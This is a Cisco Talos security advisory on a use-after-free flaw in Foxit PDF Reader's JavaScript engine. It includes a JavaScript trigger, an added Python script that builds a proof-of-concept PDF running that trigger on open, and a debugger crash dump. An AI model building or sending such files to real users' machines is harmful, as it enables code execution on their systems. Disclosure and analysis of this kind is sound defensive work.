CVE-2018-3997: TALOS-2018-0665 || Cisco Talos Intelligence Group
Summary
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader, version 9.2.0.9297. A specially crafted PDF document can cause a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
Tested Versions
Foxit Software Foxit PDF Reader 9.2.0.9297.
Product URLs
https://www.foxitsoftware.com/products/pdf-reader/
CVSSv3 Score
8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-416: Use After Free
Details
Foxit PDF Reader is one of the most popular PDF document readers and has a widespread user base. It aims for feature parity with Adobe's Acrobat Reader, and as a complete, feature-rich reader it supports JavaScript for interactive documents and dynamic forms. That JavaScript support is additional attack surface.
Embedded JavaScript can close the document it is running in. Closing the document frees many of the native objects that back it, but the script itself keeps executing. A use-after-free occurs when a JavaScript variable still holds a reference to one of those freed native objects and the script touches it after the close.
This particular vulnerability lies in saving a reference to the SeedValue object returned by the signatureGetSeedValue method of a signature form field. The native object behind it is freed when the document is closed, and accessing the stale reference afterwards triggers the use-after-free:
var tmp = app.activeDocs[0].getField('mydata').signatureGetSeedValue(); // save reference
app.activeDocs[0].closeDoc(); // close document and free objects
var ret = tmp["legalAttestations"]; // reuse stale reference and cause use-after-free
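To reproduce a bug of this shape you need the three-line script above wrapped in a PDF that actually contains a signature field named 'mydata' and runs the script on open. The following Python is an added example, not Talos's proof-of-concept file or Foxit's code: it writes a minimal single-page PDF whose catalog carries the script as an /OpenAction and whose AcroForm holds one /FT /Sig widget. The choice of a document-level OpenAction, the field geometry, and the presence of an empty /SV (seed value) dictionary on the field are assumptions made so that signatureGetSeedValue has something to return; the page does not state how the original PoC was packaged. The check_xref helper re-reads the cross-reference table so a hand-built file is not rejected by the reader before the script ever runs, and extract_open_action_js round-trips the embedded script.

```python
"""Build a minimal PDF that runs the advisory's JavaScript on open (added example, not the original PoC)."""

# The script from the advisory, verbatim; only the wrapping PDF below is constructed here.
POC_JS = (
    "var tmp = app.activeDocs[0].getField('mydata').signatureGetSeedValue();\n"
    "app.activeDocs[0].closeDoc();\n"
    "var ret = tmp['legalAttestations'];\n"
)


def pdf_string(s: str) -> bytes:
    """Encode a Python string as a PDF literal string, escaping the characters that matter."""
    escaped = s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return b"(" + escaped.encode("latin-1") + b")"


def build_pdf(js: str, field_name: str = "mydata") -> bytes:
    """Return PDF bytes: one page, one signature widget, and a document-level OpenAction."""
    objects = [
        # 1: catalog; /OpenAction runs the script as soon as the document is opened (assumption: the
        #    original PoC may have used a different trigger, e.g. a page or field action).
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R] >> "
        b"/OpenAction << /S /JavaScript /JS " + pdf_string(js) + b" >> >>",
        # 2: page tree
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        # 3: the single page, referencing the widget annotation
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >>",
        # 4: signature field merged with its widget; /SV is an (assumed) empty seed-value dictionary
        b"<< /Type /Annot /Subtype /Widget /FT /Sig /T " + pdf_string(field_name) +
        b" /Rect [50 700 250 750] /F 4 /P 3 0 R /SV << /Type /SV >> >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))          # byte offset recorded in the xref table
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"       # entry 0 is always the free-list head
    for off in offsets:
        out += b"%010d 00000 n \n" % off  # each entry is exactly 20 bytes
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objects) + 1, xref_pos))
    return bytes(out)


def check_xref(pdf: bytes) -> bool:
    """Verify that every in-use xref entry points at the 'N G obj' header it claims to."""
    tail = pdf[pdf.rindex(b"startxref") + len(b"startxref"):]
    xref_pos = int(tail.split()[0])
    if pdf[xref_pos:xref_pos + 4] != b"xref":
        return False
    keyword, subsection, _ = pdf[xref_pos:].split(b"\n", 2)
    first, count = (int(x) for x in subsection.split())
    entries_start = xref_pos + len(keyword) + 1 + len(subsection) + 1
    for i in range(count):
        entry = pdf[entries_start + 20 * i: entries_start + 20 * (i + 1)]
        offset, gen, kind = int(entry[:10]), int(entry[11:16]), entry[17:18]
        if kind == b"f":
            continue
        if not pdf[offset:].startswith(b"%d %d obj" % (first + i, gen)):
            return False
    return True


def extract_open_action_js(pdf: bytes) -> str:
    """Read the /JS literal string back out of the OpenAction (inverse of pdf_string)."""
    i = pdf.index(b"/JS (") + len(b"/JS (")
    depth, out = 1, bytearray()
    while True:
        c = pdf[i:i + 1]
        if c == b"\\":                    # backslash escape: take the next byte literally
            out += pdf[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                break
        out += c
        i += 1
    return out.decode("latin-1")


if __name__ == "__main__":
    data = build_pdf(POC_JS)
    with open("uaf-poc.pdf", "wb") as fh:
        fh.write(data)
    print("wrote %d bytes, xref ok: %s" % (len(data), check_xref(data)))
```

Open the resulting file only in an instrumented, disposable environment: under a debugger with full PageHeap enabled for FoxitReader.exe (gflags /p /enable FoxitReader.exe /full), the stale access in the third line of the script is what surfaces as the access violation shown below.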
Opening this proof-of-concept PDF document in Foxit Reader with full PageHeap enabled results in the following crash (the ???????? values in the dump are the freed page, which PageHeap has unmapped):
(244.1214): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitReader.exe -
eax=03d51598 ebx=08ef0a48 ecx=12d60fd0 edx=0bae2fd4 esi=11751fc0 edi=12e80da0
eip=01d57487 esp=0012e2f4 ebp=0012e304 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
FoxitReader!CryptUIWizExport+0x17a107:
01d57487 ff710c push dword ptr [ecx+0Ch] ds:0023:12d60fdc=????????
0:000> dd ecx
12d60fd0 ???????? ???????? ???????? ????????
12d60fe0 ???????? ???????? ???????? ????????
12d60ff0 ???????? ???????? ???????? ????????
12d61000 ???????? ???????? ???????? ????????
12d61010 ???????? ???????? ???????? ????????
12d61020 ???????? ???????? ???????? ????????
12d61030 ???????? ???????? ???????? ????????
12d61040 ???????? ???????? ???????? ????????
0:000> k 5
# ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0012e304 01d5aa84 FoxitReader!CryptUIWizExport+0x17a107
01 0012e338 01d4cf3f FoxitReader!CryptUIWizExport+0x17d704
02 0012e390 02c9f2e2 FoxitReader!CryptUIWizExport+0x16fbbf
03 0012e3d0 02ceca87 FoxitReader!FXJSE_GetClass+0x302
04 0012e42c 02cff9df FoxitReader!CFXJSE_Arguments::GetValue+0x4d357
0:000> u
FoxitReader!CryptUIWizExport+0x17a107:
01d57487 ff710c push dword ptr [ecx+0Ch]
01d5748a 8bca mov ecx,edx
01d5748c 57 push edi
01d5748d 8b402c mov eax,dword ptr [eax+2Ch]
01d57490 ffd0 call eax
Analyzing the heap state shows that ecx points into a freed memory region, which is why the first read through it faults under PageHeap. In the instructions immediately following the crash site, the value fetched from the freed object at [ecx+0Ch] is pushed as an argument and the sequence ends in an indirect call through a function pointer loaded from [eax+2Ch], so the stale object is being treated as a live object with a vtable. Without PageHeap the freed allocation would simply be reused, and since its contents can be refilled with attacker-controlled data from the same script, this is a relatively straightforward path to arbitrary code execution.
Timeline
2018-09-10 - Vendor Disclosure
2018-09-28 - Vendor patched
2018-10-01 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.